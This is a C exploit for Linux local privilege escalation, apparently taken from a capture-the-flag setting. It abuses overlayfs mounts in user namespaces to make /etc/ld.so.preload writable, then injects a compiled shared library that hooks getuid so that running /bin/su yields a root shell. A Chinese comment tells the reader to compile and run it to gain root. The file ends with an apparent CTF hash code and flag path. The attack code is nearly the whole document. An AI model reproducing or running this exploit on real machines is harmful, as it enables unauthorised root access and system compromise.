#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int child_exec(void *stuff) {
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper", 0777);
    mkdir("/tmp/ns_sploit/o", 0777);

    fprintf(stderr, "mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work", 0777);
    } else {
        file = "ns_last_pid";
    }

    chdir("/tmp/ns_sploit/o");
    rename(file, "ld.so.preload");

    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr, "mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work", 0777);
    }

    chmod("/tmp/ns_sploit/o/ld.so.preload", 0777);
    umount("/tmp/ns_sploit/o");

    return 0; // 添加返回语句
}

int main(int argc, char **argv) {
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr, "spawning threads\n");

    if ((wrapper = fork()) == 0) {
        if (unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if ((init = fork()) == 0) {
            pid_t pid = clone(child_exec, child_stack + (1024 * 1024), clone_flags, NULL);
            if (pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);
        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);
    wait(NULL);

    fprintf(stderr, "child threads done\n");

    fd = open("/etc/ld.so.preload", O_WRONLY);
    if (fd == -1) {
        fprintf(stderr, "exploit failed\n");
        exit(-1);
    }

    fprintf(stderr, "/etc/ld.so.preload created\n");
    fprintf(stderr, "creating shared library\n");
    lib = open("/tmp/ofs-lib.c", O_CREAT | O_WRONLY, 0777);
    write(lib, LIB, strlen(LIB));
    close(lib);
    lib = system("cc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if (lib != 0) {
        fprintf(stderr, "couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd, "/tmp/ofs-lib.so\n", 16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su", "su", NULL);

    return 0; // 添加返回语句
}

编译后赋权直接执行提权

1  Alec told me to place the codes here: 
  
2  568628e0d993b1973adc718237da6e93
  
3  If you captured this make sure to go here.....
4  /006-final/xvf7-flag/